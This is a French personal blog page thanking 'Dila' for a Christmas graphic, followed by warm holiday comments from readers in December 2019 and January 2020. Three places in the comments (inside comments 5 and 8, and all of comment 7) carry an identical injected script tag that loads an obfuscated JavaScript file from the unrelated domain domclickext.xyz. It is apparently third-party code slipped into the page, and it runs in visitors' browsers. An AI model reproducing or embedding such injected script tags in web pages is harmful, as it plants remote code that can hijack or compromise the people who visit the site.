• Merci Dila

    Merci Dila

    Merci Dila pour ta créa de Cloclo pour les fêtes

    petite visite sur son blog, il est ici


  • Commentaires

    13
    Dimanche 26 Janvier 2020 à 10:00

    Bonjour mon très cher DADDY

    Tout simplement pour venir te souhaiter un très bon dimanche

    et comme je te l'avais signalé j'ai fait un billet sur mon EKLABLOG concernant PERCY SLEEG

    Passe un bon dimanche

    Bisous

    Jean

    12
    Dimanche 5 Janvier 2020 à 16:42

    Bonsoir Mon très cher DADDY

    Je viens enfin de terminer le billet concernant WILLIAM BALDE

    mais c'est sur mon EKLABLOG

    Je me suis permis dans le texte de te citer que c'est toi qui me l'a fait connaître

    eet en plus j'ai mis ton lien

    de musiquesperso.

    Alors pour ce dernier si cela te dérange, je peux enlever ton lien ?

    C'est toi qui vois?

    Bonne soirée, et j'espère que le billet va te plaire aussi

    JEAN

    11
    Lundi 30 Décembre 2019 à 16:14

    Bonjour mon ami

    Une magnifique création, joli cadeau

    J'espère que Noël s'est bien passé pour toi

    Je viens te souhaitais un bon début de semaine

    Et avec un peu d'avance un bon 31 décembre, je passerais plus tard pour mes vœux.

    A bientôt gros bisous ...  Jasmine.♥

    10
    Vendredi 20 Décembre 2019 à 10:00

    Joyeux Noel bisous

    Monia59

    9
    Vendredi 20 Décembre 2019 à 09:59

    Belles fêtes de fin d'année Daddy pour toi et les tiens .

    Bises

    Nadine

    8
    Vendredi 20 Décembre 2019 à 08:16

    Bonjour Daddy ce petit cadeau

    pour te remercier de toutes tes belles chansons

    et de ta fidélité 

    sur mon blog

    bisous Line

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    7
    Vendredi 20 Décembre 2019 à 08:14

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    6
    Jeudi 19 Décembre 2019 à 12:52

    très jolie créations j'adore,temps d'hiver,maussade et tristounet  chez nous ,je te souhaite un très bon jeudi,bises

    5
    Mercredi 18 Décembre 2019 à 19:11

    Bonsoir Daddy juste pour te dire impossible de jouer a ton petit jeu sniff

    je peux meme pas mettre de j'aimes ni commentaire ?

    bonne soirée bisous 

    <script src="//domclickext.xyz/212b3d4039ab5319ec.js" type="text/javascript"></script>
    4
    Mercredi 18 Décembre 2019 à 09:24

    Bojour mon ami passe un bon mercredi bisous

    3
    Mardi 17 Décembre 2019 à 09:57

    Bonjour Daddy 

    Ah enfin je suis de retour ( et au chaud ) mais avant de venir j'avais pas mal de travail à rattraper pour l'association ... Tu as reçu une bien belle créa de Noël !!  .

    Je te souhaite une belle semaine .

    Bises

    Nadine 

    2
    Vendredi 13 Décembre 2019 à 22:49

    Coucou Daddy

    Désolée pour ce copier-coller , nous sommes enfin réparés … donc chauffage et eau chaude de retour après ces 3 semaines de panne de la chaudière . Les pièces se réchauffent gentiment ( je ne sais si le pire c’est le froid ou l’humidité … ) et j’ai pu abandonner mes triples tricots , mes doubles chaussettes et mon écharpe et je peux surtout revenir à mon ordi et donc venir vous voir . Excusez mon absence mais je ne pouvais vraiment pas rester dans la pièce de l’ordi qui était une des plus froides de la maison . Heureuse de vous retrouver et dés lundi visite des blogs amis et sans copier-coller !!!

    Bises

     

    Nadine   

    1
    Vendredi 13 Décembre 2019 à 11:52

    Coucou jolie création

     je passe vite fait de donner des bisous

    mon blog noel

    http://monique59.eklablog.com/

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :